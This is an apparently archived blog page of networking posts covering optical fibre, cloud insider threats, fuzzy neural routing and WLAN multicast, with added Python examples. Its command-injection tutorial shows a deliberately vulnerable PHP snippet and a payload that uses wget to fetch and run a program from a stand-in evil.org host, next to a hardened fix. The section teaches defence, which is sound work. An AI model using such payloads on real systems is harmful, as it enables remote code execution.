Archive for October, 2012

Optical communication networks and devices

Optical communication is taken here to mean devices that transmit data by sending pulses of light through an optical fibre. The light forms an electromagnetic carrier wave that is modulated to carry information. First developed in the 1970s, fibre-optic communication systems have revolutionized the telecommunication industry and have played a major role in the advent of the information age. Because of its advantages over electrical transmission, optical fibre is rapidly replacing copper wire in core networks in the developed world and is key for developing countries in bridging the digital divide.

Traditionally, optical devices include items such as polarizers, wave plates, reflectors, filters, and lenses. However, when we consider the concept of communication in optical devices, the scope widens to encompass beam-splitters, photo transistors, laser diodes and more, including:

  1. light emitters and receivers;
  2. linear image sensors;
  3. optoelectronic devices; and
  4. photodetectors.

The main advantage of using optical technologies in communication systems is that the high frequency of the optical carrier enables significantly more information to be transmitted over a single channel than is possible with a conventional radio or microwave system. Optical components are also much smaller and lighter, and consume less power. Since energy conservation is gaining increasing interest, the energy-saving characteristics of optical technologies represent huge opportunities for reducing the carbon footprint of ICTs.

The communication process using optical fibre involves the following basic steps (shown in Figure 1):

  • creating and encoding the optical signal involves the use of a transmitter – lasers and light-emitting diodes (LEDs) are generally used for this purpose;
  • transmitting the signal along the fibre;
  • ensuring that the signal does not become too distorted or weak, hence the use of amplifiers; and
  • receiving the optical signal and converting it into an electrical signal using an optical receiver.

Figure 1: Basic steps in optical communication

Wavelength division multiplexing (WDM) can optimize the potential high bandwidth of optical fibres by enabling several distinct data signals to share a single fibre, provided that they have different wavelengths. Multiple wavelengths are therefore multiplexed into a single optical fibre and multiple light-path data are transmitted (See Figure 2).

Figure 2: Wavelength Division Multiplexing (WDM), functional model

Current communication networks using optical fibre still need to convert the electrical signal into an optical one for transmission, and then back into electrical form at the receiving end. Thus, the potential bandwidth of optical fibres is not being fully exploited. Therefore, future research and standardization work will be focused on developing purely optical devices for communication networks.


Threat: Malicious Insiders

The threat of a malicious insider is well-known to most organizations. This threat is amplified for
consumers of cloud services by the convergence of IT services and customers under a single management
domain, combined with a general lack of transparency into provider process and procedure. For example,
a provider may not reveal how it grants employees access to physical and virtual assets, how it monitors
these employees, or how it analyzes and reports on policy compliance. To complicate matters, there is
often little or no visibility into the hiring standards and practices for cloud employees. This kind of
situation clearly creates an attractive opportunity for an adversary — ranging from the hobbyist hacker,
to organized crime, to corporate espionage, or even nation-state sponsored intrusion. The level of
access granted could enable such an adversary to harvest confidential data or gain complete control over
the cloud services with little or no risk of detection.

Impact

The impact that malicious insiders can have on an organization is considerable, given their level
of access and ability to infiltrate organizations and assets. Brand damage, financial impact, and
productivity losses are just some of the ways a malicious insider can affect an operation. As
organizations adopt cloud services, the human element takes on an even more profound importance.
It is critical therefore that consumers of cloud services understand what providers are doing to
detect and defend against the malicious insider threat.

Remediation

  1. Enforce strict supply chain management and conduct a comprehensive supplier assessment.
  2. Specify human resource requirements as part of legal contracts.
  3. Require transparency into overall information security and management practices, as well as compliance reporting.
  4. Determine security breach notification processes.


Command Injection

A successful command injection attack gives the attacker complete control of the remote system.

When user input is used as part of a system command, an attacker may be able to inject system commands through that input. This can happen in any programming language; however, it is very common in Perl, PHP, and shell-based CGI. It is less common in Java, Python, and C#. Consider the following PHP code snippet:

<?php
$email_subject = "some subject";
if (isset($_GET['email'])) {
    // Vulnerable: the untrusted 'email' parameter is concatenated straight into a shell command line
    system("mail " . $_GET['email'] . " -s '" . $email_subject . "' < /tmp/email_body", $return_val);
}
?>

The user sends his or her e-mail address in the email parameter, and that user input is placed directly into a system command. Like SQL injection, the goal of the attacker is to inject a shell command into the email parameter while ensuring that the code before and after the email parameter is syntactically correct. Consider the system() call as a puzzle. The outer puzzle pieces are in place, and the attacker must find a puzzle piece in the middle to finish it off:

mail [MISSING PUZZLE PIECE] -s 'some subject' < /tmp/email_body

The puzzle piece needs to ensure that the mail command runs and exits properly. For example, mail --help will run and exit properly. Then the attacker could add additional shell commands by separating the commands with semicolons (;). Dealing with the puzzle piece on the other side is as simple as commenting it out with the shell comment symbol (#). Thus, a useful puzzle piece for the email parameter might be this:

--help; wget http://evil.org/attack_program; ./attack_program #

Adding this puzzle piece to the puzzle creates the following shell command:

mail --help; wget http://evil.org/attack_program;
./attack_program # -s 'some subject' < /tmp/email_body

This is equivalent to this:

mail --help; wget http://evil.org/attack_program; ./attack_program

This runs mail --help and then downloads attack_program from evil.org and executes it, allowing the attacker to run arbitrary commands on the vulnerable web site.
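The same pattern carried over to Python, as an added example that is not part of the original post: the vulnerable string-building form is kept side by side with a hardened form that validates the address against an allowlist and passes arguments as a list so no shell ever parses them. The puzzle-piece mechanics are made visible by tokenising the built command the way a POSIX shell would, so you can see exactly how many simple commands an input produced. The allowlist regex, the sample addresses and the benign `echo INJECTED` stand-in for the downloaded program are constructed for this example; `mail -s` and `/tmp/email_body` come from the page.

```python
from __future__ import annotations
import re
import shlex
import subprocess

EMAIL_SUBJECT = "some subject"
# Allowlist for the address (constructed for this example; tighten to your own policy).
# It rejects whitespace, quotes, ';', '#' and a leading '-', so nothing that passes can
# ever become a shell operator or be mistaken for a mail(1) option.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+][A-Za-z0-9._%+-]*@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def build_shell_command(email: str) -> str:
    """VULNERABLE: the page's PHP pattern transcribed - untrusted input spliced into a
    command line that a shell will parse. Returned as a string, never executed here."""
    return f"mail {email} -s '{EMAIL_SUBJECT}' < /tmp/email_body"


def shell_commands_in(command: str) -> list[list[str]]:
    """Tokenise a command line the way a POSIX shell would and split it at ';'.
    One argv list per simple command; more than one means the input smuggled in
    an extra command. '#' starts a comment, exactly as in the shell."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands: list[list[str]] = []
    current: list[str] = []
    for token in lexer:
        if token == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def build_argv(email: str) -> list[str]:
    """SAFE: validate against the allowlist, then pass each argument as its own list
    element so no shell ever parses the address. Options go before the address."""
    if not EMAIL_RE.fullmatch(email):
        raise ValueError("e-mail address rejected by allowlist")
    return ["mail", "-s", EMAIL_SUBJECT, email]


def send_mail(email: str, body_path: str = "/tmp/email_body") -> int:
    """Run mail(1) without a shell; the body comes from stdin instead of '<' redirection."""
    with open(body_path, "rb") as body:
        return subprocess.run(build_argv(email), stdin=body, check=False).returncode


if __name__ == "__main__":
    # Constructed inputs: a normal address and a puzzle piece in the page's style,
    # with a harmless 'echo' standing in for the downloaded program.
    for candidate in ("alice@example.org", "--help; echo INJECTED #"):
        print(candidate, "->", shell_commands_in(build_shell_command(candidate)))
        try:
            print("argv:", build_argv(candidate))
        except ValueError as exc:
            print("argv:", exc)
```

Two points worth noting. The tokeniser shows the puzzle piece turning one `mail` command into two commands, with everything after `#` discarded, which is the whole trick the text describes. The list form of `subprocess.run` removes the shell from the picture entirely, but it does not stop an address beginning with `-` from being read by `mail` as an option; that is why the allowlist forbids a leading hyphen and why options are placed before the address rather than after it.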


Fuzzy Neural Network for Routing

Consider the computer network in Figure 1.11. Suppose a message needs to be sent from
node A (source) to node G (destination). The first decision faced by the routing algorithm at
node A will be to determine if the message should be transmitted through node B (link 1),
node C (link 2) or node D (link 3). Determining a value for each of those three possible
outgoing links will make this decision. These three values, computed by the proposed routing
strategy, will represent the expected time to destination via node B (link 1), node C (link 2)
and node D (link 3). These three time values will be compared and the link that gives the
shortest expected time will be chosen as the first link in routing the message to the destination
(node G).

Figure 1.11: Example computer network

The expected time value for every outgoing link will be determined through the use of
fuzzy logic and a neural network, using information specific to each outgoing link as
described in the previous section (distance, throughput, congestion and failure state). Each of
our four metrics was described earlier with three concepts. For example, distance could be
short, medium, or long. Although illustrated on the same graph in our figures because they
pertained to the same concept, these actually represent separate fuzzy sets. That is, “short
distance” is one fuzzy set. It happens to overlap with “medium distance” which is another
fuzzy set. For a particular outgoing link and destination, we might have membership grades
of 0.0 for “short distance”, 0.4 for “medium distance”, and 0.8 for “long distance”, meaning
that the distance tends to be slightly more long than medium for this route. The source node
will maintain a fuzzy neural network that will assess the time required for the data to reach
the destination via that particular link. Therefore, this membership grade information needs
to be conveyed to the neural network for each of our four metrics. Thus, three fuzzy sets for
each of four metrics results in twelve fuzzy sets for each link considered (see Table 1.0).

Table 1.0 : Twelve fuzzy sets

Data for a particular link (distance, throughput, congestion, failure) will be transformed
into twelve fuzzy membership grades, one for each of the fuzzy sets, thus resulting in twelve
inputs to the neural network. In addition to the twelve fuzzy membership grades, there will be
two additional inputs to the neural network, namely the packet size and destination of the
message. The neural network design is illustrated in Figure 1.12.

Figure 1.12: Neural network design

When node A’s controller (Figure 1.11) determines the best link to use from among link1,
link 2 or link 3, the neural network will be invoked three different times using three sets of
inputs to get three expected time values. These three time values are then compared to find
the link that will give the lowest expected time to reach the destination. That will be the link
chosen to send the message along. When the message arrives at the next node, the same
process will be repeated using a similar neural network for all outgoing links of that particular
node. This procedure continues until the destination node is reached. A similar, but not
identical, neural network will be present at each node of the computer network. This
dissertation will establish the advantages of this routing strategy by testing it at a single source
node. Results obtained with this neural network can easily be generalized to all nodes on the
computer network.
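The routing decision described above, as an added Python example that is not code from the dissertation: each of the four link metrics is fuzzified into three membership grades (twelve fuzzy sets, as in Table 1.0), packet size and destination are appended to give fourteen inputs, and a small feed-forward network is invoked once per outgoing link so that the link with the lowest expected time can be chosen. The trapezoid breakpoints, the node list, the link metrics and the network weights are all constructed for this example; the weights in particular are seeded random and untrained, whereas the dissertation's network would be trained on observed delivery times. The breakpoints are chosen so that the page's own illustration (0.0 short, 0.4 medium, 0.8 long) is reproduced for a distance of 720 km.

```python
from __future__ import annotations
import math
import random

INF = math.inf


def trapezoid(x: float, a: float, b: float, c: float, d: float) -> float:
    """Trapezoidal membership function: 0 up to a, rising to 1 over [a, b],
    1 over [b, c], falling back to 0 over [c, d]. a == b gives a left shoulder,
    c == d == INF gives a right shoulder."""
    if b <= x <= c:
        return 1.0
    if a < x < b:
        return (x - a) / (b - a)
    if c < x < d:
        return (d - x) / (d - c)
    return 0.0


# Three linguistic terms per metric -> twelve fuzzy sets (Table 1.0).
# Breakpoints are constructed for this example; the dissertation's curves are not on the page.
FUZZY_SETS = {
    "distance":   {"short": (0, 0, 200, 400), "medium": (200, 400, 600, 800), "long": (500, 775, INF, INF)},          # km
    "throughput": {"low": (0, 0, 10, 30), "medium": (10, 30, 60, 80), "high": (60, 80, INF, INF)},                     # Mbit/s
    "congestion": {"light": (0, 0, 0.2, 0.4), "moderate": (0.2, 0.4, 0.6, 0.8), "heavy": (0.6, 0.8, INF, INF)},        # queue load 0..1
    "failure":    {"healthy": (0, 0, 0.1, 0.3), "degraded": (0.1, 0.3, 0.6, 0.8), "failed": (0.6, 0.8, INF, INF)},     # failure probability
}
METRICS = list(FUZZY_SETS)      # fixed input order: distance, throughput, congestion, failure
N_INPUTS = 12 + 2               # twelve membership grades + packet size + destination
NODES = ["A", "B", "C", "D", "E", "F", "G"]   # constructed; the page names A, B, C, D and G


def fuzzify(link: dict[str, float]) -> list[float]:
    """Turn one link's four crisp metrics into twelve membership grades, in FUZZY_SETS order."""
    return [trapezoid(link[m], *pts) for m in METRICS for pts in FUZZY_SETS[m].values()]


def build_inputs(link: dict[str, float], packet_size: int, destination: str) -> list[float]:
    """Twelve grades plus packet size (normalised to a 1500-byte MTU) and destination index."""
    return fuzzify(link) + [packet_size / 1500.0, NODES.index(destination) / (len(NODES) - 1)]


class FuzzyNeuralNet:
    """One tanh hidden layer mapping the 14 inputs to an expected time-to-destination.
    Weights are illustrative (seeded random, untrained) - a stand-in for the trained net."""

    def __init__(self, n_hidden: int = 6, seed: int = 1) -> None:
        rng = random.Random(seed)
        self.w_hidden = [[rng.uniform(-1, 1) for _ in range(N_INPUTS)] for _ in range(n_hidden)]
        self.b_hidden = [rng.uniform(-1, 1) for _ in range(n_hidden)]
        self.w_out = [rng.uniform(-1, 1) for _ in range(n_hidden)]
        self.b_out = rng.uniform(-1, 1)

    def expected_time(self, inputs: list[float]) -> float:
        if len(inputs) != N_INPUTS:
            raise ValueError(f"expected {N_INPUTS} inputs, got {len(inputs)}")
        hidden = [math.tanh(sum(w * x for w, x in zip(row, inputs)) + b)
                  for row, b in zip(self.w_hidden, self.b_hidden)]
        raw = sum(w * h for w, h in zip(self.w_out, hidden)) + self.b_out
        return math.log1p(math.exp(raw))   # softplus: an expected time is never negative


def choose_link(net: FuzzyNeuralNet, links: dict[str, dict[str, float]],
                packet_size: int, destination: str) -> tuple[str, dict[str, float]]:
    """Node controller: invoke the network once per outgoing link, return (best link, all times)."""
    times = {name: net.expected_time(build_inputs(metrics, packet_size, destination))
             for name, metrics in links.items()}
    return min(times, key=times.get), times


# Constructed metrics for node A's three outgoing links of Figure 1.11.
EXAMPLE_LINKS = {
    "link 1 (via B)": {"distance": 720, "throughput": 50, "congestion": 0.5, "failure": 0.05},
    "link 2 (via C)": {"distance": 150, "throughput": 20, "congestion": 0.85, "failure": 0.02},
    "link 3 (via D)": {"distance": 420, "throughput": 90, "congestion": 0.3, "failure": 0.7},
}

if __name__ == "__main__":
    best, times = choose_link(FuzzyNeuralNet(), EXAMPLE_LINKS, packet_size=1200, destination="G")
    for name, t in times.items():
        print(f"{name}: expected time {t:.3f}")
    print("chosen:", best)
```

The membership grades are deliberately not normalised to sum to one: as the text says, "medium distance" and "long distance" are separate overlapping sets, so one distance can belong to both with different grades. Replacing the seeded weights with trained ones is the only change needed to make this the procedure the dissertation evaluates at node A.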


Multicast for Multirate Wireless LANs

Most research efforts on multicasting in IEEE 802.11 WLANs have focused on improving the
service reliability by integrating ARQ mechanisms into the protocol architecture. In, the
Leader-Based Protocol (LBP) ARQ mechanism has been introduced to provide the multicast
service with some level of reliability. To address the ACK implosion problem, LBP assigns
the role of group leader to the multicast receiver exhibiting the worst signal quality in
the group. The group leader holds the responsibility to acknowledge the multicast packets
on behalf of all the multicast group members, whereas other MTs may issue Negative
Acknowledgement (NACK) frames when they detect errors in the transmission process.

The 802.11MX reliable multicast scheme described in uses an ARQ mechanism supplemented by
a busy tone signal. When an MT associated to a multicast group receives a corrupted packet,
it sends a NACK tone instead of actually transmitting a NACK frame. Upon detecting the
NACK tone, the sender will retransmit the data packet. Since the 802.11MX mechanism does
not need a leader to operate, it performs better than the LBP protocol in terms of both
data throughput and reliability. However, this mechanism is very costly since it requires
a signaling channel to send the NACK frames and busy tones. Moreover, both LBP and
802.11MX schemes do not adapt the multicast PHY rate to the state of receivers.

Very recently, the RAM scheme has been proposed in for reliable multicast delivery.
Similar to the LBP and 802.11MX schemes, the transmitter has first to send a RTS
frame to indicate the beginning of a multicast transmission. However, in RAM the RTS
frame is used by all the multicast receivers to measure the Receiver Signal Strength
(RSS). Then, each multicast receiver has to send a variable length dummy CTS frame
whose length depends on the selected PHY transmission mode. Finally, the transmitter
senses the channel to measure the collision duration and can adapt the PHY rate
transmission of the multicast data frame accordingly. This smart solution is more
practical than 802.11MX since it does not require a signaling channel, but it still
requires the RTS/CTS mechanism and targets reliable transmission applications.

In SNR-based Auto Rate for Multicast (SARM) is proposed for multimedia streaming
applications. In SARM, multicast receivers measure the SNR of periodically broadcast
beacon frames and transmit back this information to the AP. To minimize feedback
collision, the backoff time to send this feedback increases linearly with the
received SNR value. Then, the AP selects the lowest received SNR to adapt the
PHY rate transmission. The main problem with this approach is that the transmission
mode cannot be adapted for each multicast frame: the multicast PHY rate of SARM is
only adapted once per beacon interval. SARM does not make use of any error recovery
mechanism such as data retransmission.

Note that, with the exception of RAM and SARM, the mechanisms described above
only address the reliability of the multicast service in WLANs. Only
RAM and SARM adapt the PHY transmission rate of the multicast data frames.
In this paper, we define an architecture by integrating the following
facilities: 1) the optimal channel rate adaptation of the multicast service in
IEEE 802.11 WLANs, 2) a more reliable transmission of the multicast data, 3)
the limitation on the overhead required by the signaling mechanism, and
4) the support of heterogeneity of receivers by using different multicast
groups and hierarchical video coding. The definition of the proposed cross layer
architecture is based on the multirate capabilities present in the PHY layer of
IEEE 802.11 WLANs.
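The SARM feedback exchange described above, as an added Python simulation that is not code from the paper or from any 802.11 implementation: receivers measure the beacon SNR, each defers its feedback by a backoff that grows linearly with that SNR (so the weakest receiver answers first), and the AP adapts the PHY rate to the lowest SNR it actually hears. The SNR-to-rate thresholds, the slot granularity, the receiver SNR values and the rule that two feedback frames in the same slot collide and are both lost are constructed assumptions made to show why a linear backoff only minimises rather than eliminates feedback collisions.

```python
from __future__ import annotations
from collections import defaultdict

# Constructed SNR (dB) -> 802.11a/g PHY rate (Mbit/s) thresholds; real values depend on hardware.
RATE_TABLE = [(25, 54), (22, 48), (18, 36), (13, 24), (10, 18), (8, 12), (6, 9), (0, 6)]
BASE_RATE = 6


def rate_for_snr(snr_db: float) -> int:
    """Highest PHY rate whose (constructed) SNR threshold the measured SNR meets."""
    for threshold, rate in RATE_TABLE:
        if snr_db >= threshold:
            return rate
    return BASE_RATE


def feedback_slots(receivers: dict[str, float], slots_per_db: float = 1.0) -> dict[int, list[str]]:
    """SARM receiver side: backoff grows linearly with the beacon SNR each receiver measured,
    so poorer receivers contend earlier. Returns slot -> receivers transmitting in that slot."""
    slots: dict[int, list[str]] = defaultdict(list)
    for name, snr in receivers.items():
        slots[int(snr * slots_per_db)].append(name)
    return dict(slots)


def ap_select_rate(receivers: dict[str, float], slots_per_db: float = 1.0):
    """SARM AP side: collect the feedback frames that arrive uncollided (assumption: two
    receivers in one slot collide and neither is heard) and adapt the PHY rate to the
    lowest SNR received. Returns (selected_snr or None, rate, collided receivers)."""
    slots = feedback_slots(receivers, slots_per_db)
    heard: dict[str, float] = {}
    collided: list[str] = []
    for slot in sorted(slots):
        names = slots[slot]
        if len(names) == 1:
            heard[names[0]] = receivers[names[0]]
        else:
            collided.extend(names)
    if not heard:
        return None, BASE_RATE, collided      # nothing heard: fall back to the base rate (assumption)
    weakest = min(heard, key=heard.get)
    return heard[weakest], rate_for_snr(heard[weakest]), collided


if __name__ == "__main__":
    # Constructed beacon SNR measurements for four multicast receivers (MTs).
    rx = {"mt1": 27.5, "mt2": 12.0, "mt3": 19.3, "mt4": 12.4}
    for granularity in (1.0, 10.0):
        snr, rate, lost = ap_select_rate(rx, slots_per_db=granularity)
        print(f"{granularity} slots/dB: heard min SNR {snr}, rate {rate} Mbit/s, collided {lost}")
```

With one slot per dB the two weakest receivers land in the same slot, their feedback collides, and the AP settles on a rate only the two stronger receivers can decode; with ten slots per dB all four are heard and the rate drops to what the weakest can handle. The rate chosen then holds for the whole beacon interval, which is the per-frame adaptation limitation the text points out.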
